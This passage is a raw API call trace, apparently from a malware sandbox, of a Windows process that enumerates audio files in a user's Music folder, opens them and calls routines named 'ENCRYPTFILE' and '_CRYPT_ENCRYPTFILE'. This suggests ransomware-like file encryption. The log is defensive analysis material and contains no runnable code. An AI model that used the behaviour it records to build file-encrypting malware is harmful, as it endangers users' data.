nFileSizeHigh=0x43c3570, nFileSizeLow=0x43c34dc, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="", cAlternateFileName="ﶰмńဓ+\x10")) returned 0 [0115.048] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0115.049] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|0QhbS_hT9Zbd62A.m4a|4YRCHooZsp.mp3|g4kPqWyZSQA5pz.wav|zMKZMHlWmMpV7lZ.m4a", cchCount1=74, lpString2="", cchCount2=0) returned 3 [0115.049] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0115.049] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\0QhbS_hT9Zbd62A.m4a", lpFindFileData=0x144ebc8 | out: lpFindFileData=0x144ebc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f0f9c40, ftCreationTime.dwHighDateTime=0x1d5ed25, ftLastAccessTime.dwLowDateTime=0xd9ec78c0, ftLastAccessTime.dwHighDateTime=0x1d5e6b5, ftLastWriteTime.dwLowDateTime=0xd9ec78c0, ftLastWriteTime.dwHighDateTime=0x1d5e6b5, nFileSizeHigh=0x0, nFileSizeLow=0x6953, dwReserved0=0xdf0b28, dwReserved1=0x8, cFileName="0QhbS_hT9Zbd62A.m4a", cAlternateFileName="0QHBS_~1.M4A")) returned 0x41ac440 [0115.049] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0115.049] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0115.049] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0115.049] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0115.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0115.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca898, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0115.050] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\0QhbS_hT9Zbd62A.m4a" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\0qhbs_ht9zbd62a.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0115.050] FreeLibrary (hLibModule=0x772d0000) returned 1 [0115.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0115.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e8ab0 [0115.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0115.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0115.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0115.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0115.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0115.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0115.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0115.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0115.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0115.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0115.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0115.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0115.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9128 [0115.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0115.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0115.051] PeekMessageW (in: lpMsg=0x144ec64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec64) returned 0 [0115.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0115.051] PeekMessageW (in: lpMsg=0x144ec64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec64) returned 0 [0115.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0115.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0115.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0115.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0115.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0115.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0115.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0115.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0115.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0115.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0115.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0115.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0115.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0115.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0115.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0115.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0115.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0115.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0115.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0115.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0115.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0115.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0115.052] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0115.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0115.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0115.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0115.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0115.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0115.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0115.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0115.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0115.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0115.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0115.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0115.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0115.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0115.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0115.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0115.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0115.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0115.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0115.053] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0115.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0115.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0115.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0115.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca730 [0115.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca730, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0115.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0115.054] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0115.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0115.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0115.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0115.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0115.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0115.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0115.054] CloseHandle (hObject=0x298) returned 1 [0115.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0115.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9350 [0115.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0115.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0115.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0115.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0115.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0115.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0115.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0115.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0115.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0115.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0115.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0115.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0115.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0115.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0115.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0115.055] FreeLibrary (hLibModule=0x772d0000) returned 1 [0115.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0115.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0115.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0115.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0115.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0115.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0115.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0115.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0115.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0115.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0115.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0115.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0115.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0115.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0115.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0115.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0115.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0115.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0115.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0115.056] PeekMessageW (in: lpMsg=0x144ec64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec64) returned 0 [0115.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0115.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0115.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0115.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0115.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0115.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0115.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0115.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0115.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0115.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0115.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0115.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0115.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0115.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0115.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0115.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0115.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0115.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0115.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0115.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0115.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0115.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0115.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0115.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0115.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0115.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0115.057] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0115.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0115.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0115.057] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0115.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c40 | out: hHeap=0x1780000) returned 1 [0115.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0115.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0115.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2710 [0115.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0115.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0115.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0115.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0115.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0115.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26c0 [0115.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0115.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0115.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0115.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0115.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0115.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0115.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0115.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0115.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0115.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0115.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0115.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0115.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25d0 [0115.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0115.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0115.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0115.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0115.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2680 [0115.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0115.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0115.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0115.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca418 [0115.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0115.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0115.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0115.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0115.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0115.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0115.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0115.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0115.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0115.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0115.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0115.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b98 [0115.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0115.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0115.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0115.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0115.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0115.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0115.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0115.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0115.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0115.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0115.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0115.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0115.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0115.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0115.060] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0115.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0115.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0115.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0115.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0115.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0115.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0115.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0115.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0115.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0115.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0115.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0115.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0115.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0115.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0115.060] 